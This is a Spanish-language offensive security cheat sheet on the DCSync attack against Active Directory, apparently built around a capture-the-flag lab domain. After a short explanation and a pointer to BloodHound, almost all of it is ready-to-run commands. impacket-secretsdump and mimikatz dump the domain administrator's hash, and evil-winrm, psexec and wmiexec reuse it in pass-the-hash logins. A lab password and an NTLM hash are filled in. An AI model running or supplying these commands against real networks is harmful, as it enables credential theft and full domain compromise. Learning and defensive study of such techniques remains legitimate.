⚪ DCSync

Información

El ataque DCSync en un entorno de Acive Directory, ocurre cuando un usuario dispone de permisos GetChanges, GetChangesAll, AllExtendedRights sobre el dominio. El usuario que tiene capacidad de DCSync puede obtener el hash del usuario administrator, que posteriormente podemos utilizar para realizar PassTheHash y acceder al sistema sin necesidad de conocer su password.

Detectar

BloodHound

GetChanges / GetChangesAll

AllExtendedRights

Explotar

Obtener Hashes

Remoto
secretsdump
impacket-secretsdump EGOTISTICAL-BANK.LOCAL/svc_loanmgr@192.168.1.2
impacket-secretsdump EGOTISTICAL-BANK.LOCAL/svc_loanmgr:'Moneymakestheworldgoround!'@192.168.1.2 -just-dc-user administrator
Local
mimikatz
.\mimikatz.exe 'lsadump::dcsync /domain:EGOTISTICAL-BANK.LOCAL /user:administrator' exit
\\192.168.1.2\a\mimikatz.exe 'lsadump::dcsync /domain:EGOTISTICAL-BANK.LOCAL /user:administrator' exit

PassTheHash (PtH)

WINRM
evil-winrm
evil-winrm -i 192.168.1.2 -u 'administrator' -H '823452073d75b9d1cf70ebdf86c7f98e'
SMB
psexec
impacket-psexec EGOTISTICAL-BANK.LOCAL/administrator@192.168.1.2 cmd.exe -hashes ':823452073d75b9d1cf70ebdf86c7f98e'
impacket-psexec -hashes ':823452073d75b9d1cf70ebdf86c7f98e' -dc-ip 192.168.1.2 administrator@192.168.1.2
wmiexec
impacket-wmiexec -hashes ':823452073d75b9d1cf70ebdf86c7f98e' -dc-ip 192.168.1.2 administrator@192.168.1.2

© d4t4s3c 2025

results matching ""

    No results matching ""